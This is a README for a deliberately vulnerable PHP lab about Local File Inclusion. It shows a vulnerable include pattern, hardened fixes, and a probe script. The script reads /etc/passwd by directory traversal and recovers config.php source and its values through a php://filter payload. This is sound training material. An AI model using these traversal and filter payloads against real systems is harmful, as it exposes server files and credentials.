Learn to identify and exploit Local File Inclusion vulnerabilities in PHP web applications to access sensitive configuration files and extract critical information.
This lab demonstrates a deliberately vulnerable independent cinema platform called Cinematika. Its page routing system takes the requested page name from the `page` parameter and includes the corresponding file without proper validation, which makes it vulnerable to Local File Inclusion (LFI): an attacker can use directory traversal to read arbitrary files from the server filesystem, including the application's own configuration.
- Identify a Local File Inclusion vulnerability
- Exploit directory traversal to access system files
- Extract sensitive configuration data from PHP source files
- Understand the impact of insecure file inclusion
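To make the vulnerability class concrete, the following is an added example written for this README; it is not Cinematika's actual `index.php`, whose source is not reproduced here. It assumes a router that maps `?page=` to files under `templates/`, and shows the unsafe include pattern next to two hardened alternatives (an allow-list, and a `realpath()` containment check for code that must accept a filename). The template names are invented for illustration.

```php
<?php
// Added example, not the lab's own source. Assumed layout: index.php routes
// ?page=... to files under templates/. Requires PHP 8 for str_starts_with().

// --- Vulnerable pattern (illustrative) ---
// The value of ?page= is concatenated into an include path with no validation.
// "../config.php" or "../../../../etc/passwd" escape the templates directory,
// and when the user-controlled value sits at the start of the path, a
// php://filter/convert.base64-encode/resource=... payload returns PHP source
// base64-encoded instead of executing it.
function render_page_vulnerable(string $page): void
{
    include __DIR__ . '/templates/' . $page;
}

// --- Hardened pattern 1: allow-list ---
// Map the request to a fixed set of known template files; never build a
// filesystem path from user input at all.
const TEMPLATES = [
    'home'     => 'home.php',      // assumed names
    'schedule' => 'schedule.php',
    'about'    => 'about.php',
];

function render_page_safe(string $page): void
{
    if (!array_key_exists($page, TEMPLATES)) {
        http_response_code(404);
        echo 'Page not found';
        return;
    }
    include __DIR__ . '/templates/' . TEMPLATES[$page];
}

// --- Hardened pattern 2: containment check ---
// For code that genuinely has to accept a filename, canonicalise it and
// confirm the result is still inside the intended directory. realpath()
// returns false for non-existent paths and for php:// wrapper strings, so
// both traversal and filter tricks are rejected.
function resolve_template(string $page): ?string
{
    $base = realpath(__DIR__ . '/templates');
    if ($base === false) {
        return null;
    }
    $path = realpath($base . '/' . $page);
    if ($path === false || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

$page = $_GET['page'] ?? 'home';
render_page_safe($page);
```

The allow-list is the preferred fix: it removes the attacker's control over the path entirely, whereas the `realpath()` check still depends on the check running before every include and on `open_basedir`-style assumptions about what lives under `templates/`.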
Difficulty: Intermediate
Estimated time: 30-45 minutes
- Basic understanding of web application security
- Knowledge of directory traversal techniques
- Familiarity with PHP file inclusion
- Understanding of HTTP requests and responses
├── deploy/ # Docker configuration and application files
│ ├── index.php # Main application entry point (vulnerable)
│ ├── config.php # Configuration file containing sensitive data
│ └── templates/ # HTML templates
├── test/ # Automated vulnerability tests
├── docs/ # Documentation
├── README.md # This file
└── .gitignore
Docker and Docker Compose installed locally.
- Clone the repository
- Navigate to the project directory
- Run the application:
```bash
cd deploy
docker-compose up --build -d
```
- Visit http://localhost:3206 and start testing the `page` parameter
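Once the container is up, a small probe script helps confirm the two behaviours the objectives list (directory traversal, and reading PHP source via `php://filter`). The script below is an added example, not part of the lab; it assumes the app listens on http://localhost:3206, routes via `index.php?page=`, and passes the value to `include()` with no prefix or suffix. If the application appends `.php` itself, drop the extension from the `resource=` part of the filter payload; if it prepends a directory, the `php://` wrapper will not be recognised and only plain traversal applies.

```php
<?php
// Added example, not part of the lab. Run with: php probe.php
// Assumed target and parameter; adjust if the routing differs.
declare(strict_types=1);

const TARGET = 'http://localhost:3206/index.php?page=';

function fetch(string $payload): string
{
    $ctx  = stream_context_create(['http' => ['ignore_errors' => true, 'timeout' => 5]]);
    $body = @file_get_contents(TARGET . rawurlencode($payload), false, $ctx);
    return $body === false ? '' : $body;
}

// 1. Directory traversal: /etc/passwd has a recognisable first line, so it is
//    a safe, low-impact indicator that the include escaped the web root.
$passwd = fetch('../../../../etc/passwd');
printf("[%s] directory traversal via ../\n", str_contains($passwd, 'root:x:0:0') ? '+' : '-');

// 2. Source disclosure: include() on a php://filter stream hands back the file
//    base64-encoded rather than executing it, so the <?php tag and any
//    $name = '...' assignments in config.php appear in the response body.
$encoded = fetch('php://filter/convert.base64-encode/resource=config.php');
if (preg_match('/[A-Za-z0-9+\/=]{40,}/', $encoded, $m)) {
    $source = base64_decode($m[0], true);
    if ($source !== false && str_contains($source, '<?php')) {
        echo "[+] config.php source recovered:\n", $source, "\n";
        // List simple string assignments as a starting point for review;
        // which ones are secrets is for the analyst to judge.
        if (preg_match_all('/\$(\w+)\s*=\s*[\'"]([^\'"]*)[\'"]/', $source, $pairs, PREG_SET_ORDER)) {
            foreach ($pairs as [, $name, $value]) {
                printf("    %-20s %s\n", $name, $value);
            }
        }
    } else {
        echo "[-] base64 blob found but it does not decode to PHP source\n";
    }
} else {
    echo "[-] no base64 blob in response; the app may prefix or suffix the path\n";
}
```

Reading `config.php` through the filter wrapper matters because a plain `?page=config.php` would execute the file and show nothing: the secrets only become visible when the include returns the raw source.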
Report issues at: https://github.com/ctf-labs/php-lfi/issues